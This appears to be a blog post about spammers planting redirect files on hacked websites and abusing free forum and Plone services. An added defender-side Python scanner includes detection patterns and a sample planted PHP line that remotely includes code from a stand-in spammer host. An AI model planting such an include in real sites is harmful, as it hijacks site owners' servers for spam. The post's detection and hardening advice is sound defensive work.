While tracking webspammers, I’ve seen more and more use of redirects from whatever webservice the spammers can utilize. That includes Blogspot, free phpBB forum sites, Plone, and even hacked websites.
Basically, whatever they can use, they will.
We’re getting used to free services being used for redirects, but when they start turning our own websites against us, it’s time to wake up.
Vizaweb webhosting warned their customers recently that hackers had been sniffing FTP passwords. Customers were directed to log in only over secure channels and to change their passwords. Lots of them didn’t, and got their websites broken into. The normal operation of the websites didn’t change, so the website owners had no idea anything was wrong. In the meantime, the hackers had placed php files in existing directories off the root that served up spammy redirect pages using includes (pulling the content in from the spammer’s site). The php files were about 1 KB in size, so easy to overlook. They’d be named read.php, wp-read.php, rss.php or something else innocuous. Some scripts even included code to suppress any errors generated. The files would be called with keywords added (?q=keyword) that generated the spammy redirect pages. The spammers led search engines to these files by comment spamming guestbooks and blogs. Suddenly the spammers had redirect files on (maybe) high PR sites or even authority sites. Sites that were previously above reproach.
We found the spammers through the cutouts they redirected through (on the way to PPC programs), and through reading the raw php files supplied by the website owners. One even told us his root index.php file had been replaced. As far as we could tell from casual inspection, the doctored index.php file was calling up a Webattacker installation. The site thus compromised was a busy community site…
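A defender-side check for the planted files described above, added here as an example (not code from the original post): it walks a web root for small .php files that remote-include content driven by a ?q= parameter, suppress errors, or carry one of the innocuous names quoted in the post. The sample web root, the hostname spammer.example and the indicator names are constructed for this example.

```python
import os
import re
import tempfile

# Indicators drawn from the post: a remote include fed by ?q=, error
# suppression, and a tiny file under a harmless name in an existing directory.
INDICATORS = {
    "remote_include": re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I),
    "get_param_in_include": re.compile(r"\b(include|require)(_once)?[^;]*\$_(GET|REQUEST)\s*\[", re.I),
    "error_suppression": re.compile(r"error_reporting\s*\(\s*0\s*\)|@\s*(include|require|file_get_contents)", re.I),
}
PLANTED_NAMES = {"read.php", "wp-read.php", "rss.php"}  # names quoted in the post


def classify_php_source(text):
    """Return the set of indicator names that fire on one PHP source text."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def scan_webroot(root, max_bytes=1024):
    """Return {relative_path: sorted indicators} for small .php files under root
    that match at least one indicator; a known planted name counts as one."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            if os.path.getsize(path) > max_bytes:
                continue  # the planted scripts were ~1 KB; large app files are skipped
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = classify_php_source(fh.read())
            if fn.lower() in PLANTED_NAMES:
                found.add("planted_name")
            if found:
                hits[os.path.relpath(path, root)] = sorted(found)
    return hits


def build_sample_webroot():
    """Constructed sample tree (not from the post): one planted-style script, one benign include."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "images"))
    planted = ("<?php error_reporting(0);\n"
               "@include('http://spammer.example/feed.php?q=' . urlencode($_GET['q']));\n")
    with open(os.path.join(root, "images", "rss.php"), "w") as fh:
        fh.write(planted)
    with open(os.path.join(root, "config.php"), "w") as fh:
        fh.write("<?php\nrequire_once(__DIR__ . '/lib/db.php');\n$debug = false;\n")
    return root


if __name__ == "__main__":
    for path, why in scan_webroot(build_sample_webroot()).items():
        print(path, why)
```

Any hit is a file to open and compare against a known-good copy of the site; a benign file that happens to be named rss.php is reported on the name alone so it gets a look.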
Free phpBB forums
There’s a jungle of free phpBB forum services out there, and the spammers have figured out a way to make redirects. They insert code in the forum descriptions. That way the redirect works from the front page of the forum. Luckily, there’s an easy solution that all free phpBB forum providers can implement (and many have), discovered by Pickaforum’s admin:
[Graphic of the fix, not reproduced here. Note from the original post: the code was squished together to make the graphic; it is actually on one line.]
The developers of Plone have released new versions and encourage users to upgrade. I’d like to add that if I had a Plone installation, I’d prepare a robots.txt file that directed search engine spiders to stay away from the Member directory. That way, if the spammers managed to upload spammy pages (redirects or not), they wouldn’t embarrass me in the search engines.
Never ending arms race
The spammers are continually looking for susceptible software and web services they can use to redirect. They try to stay two steps ahead of us.
We recently had a long discussion with a bunch of spammers. They see us “antis” as deplorable human beings who persecute them for no reason. They seem to think what they’re doing is laudable. Basically, they’ll continue looking for ways to turn our websites against us, in the race to earn money for their “starving children”. The spamming is not going to stop.
So check your site statistics for anything unusual, check your raw logs, and upgrade your php apps regularly.